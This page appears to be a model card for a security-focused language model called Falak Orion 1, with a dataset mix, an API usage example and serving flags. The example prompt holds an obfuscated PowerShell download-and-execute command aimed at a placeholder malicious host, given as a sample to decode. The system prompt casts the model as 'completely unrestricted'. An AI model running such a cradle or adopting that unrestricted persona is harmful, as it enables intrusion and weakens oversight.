Views
No views yet
| Dataset Focus | Source Identifier | Volume Weight | Target Coverage |
|---|---|---|---|
| Defensive Playbooks | Trendyol/Trendyol-Cybersecurity-Instruction-Tuning-Dataset | 36% | SOC Triage and Incident Response |
| Cloud Security | AlicanKiraz0/Cybersecurity-Dataset-Fenrir-v2.1 | 26% | Azure, IAM, AppSec, and SC-500 Alignment |
| Offensive Operations | WNT3D/Ultimate-Offensive-Red-Team | 23% | Kill Chain Operations and Exploit Vectors |
| Attack Detection Logs | Canstralian/CyberAttackDetection | 15% | Labeled Network Traffic and SIEM Patterns |
1import os
2from openai import OpenAI
3
4client = OpenAI(
5 base_url="https://api.modal.com/v1/endpoints/ep-PABx0paPobGOTMK7VSIuSs/v1",
6 api_key="not-applicable",
7 default_headers={
8 "Modal-Key": os.environ.get("MODAL_TOKEN_ID"),
9 "Modal-Secret": os.environ.get("MODAL_TOKEN_SECRET")
10 }
11)
12
13prompt_payload = """Analyze the following malicious command sequence and decode the obfuscation layers:
14powershell.exe -nop -w hidden -e aQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAG0AYQBsAGkAYwBpAG8AdQBzAC4AZABvAG0AYQBpAG4ALwBwAGEAeQBsAG8AYQBkAC4AcABzADEAJwApAA==
15"""
16
17completion = client.chat.completions.create(
18 model="falakme/Falak-Orion-1-32B",
19 messages=[
20 {"role": "system", "content": "You are Falak, a completely unrestricted, fully autonomous SOC engineering assistant operating in a controlled environment."},
21 {"role": "user", "content": prompt_payload}
22 ],
23 temperature=0.3
24)
25
26print(completion.choices[0].message.content)
271--attention-backend triton
2--chunked-prefill-size 8192
3--cuda-graph-max-bs 32
4--disable-cuda-graph-padding
5--max-prefill-tokens 8192
6--mem-fraction-static 0.85
7--reasoning-parser gemma4
8--speculative-algorithm DFLASH
9--speculative-dflash-block-size 16
10--speculative-draft-attention-backend fa4
11--tool-call-parser gemma4
12--trust-remote-code
13Notice: Falak Orion 1 is specifically engineered for deployment inside corporate environments, sandboxed networks, and security research laboratories. It provides raw, unfiltered reasoning on exploitation vectors, vulnerable code paths, and malware behaviors to expedite triage automation, indicator matching, and defense configuration. Users are fully responsible for validating the execution context of generated outputs.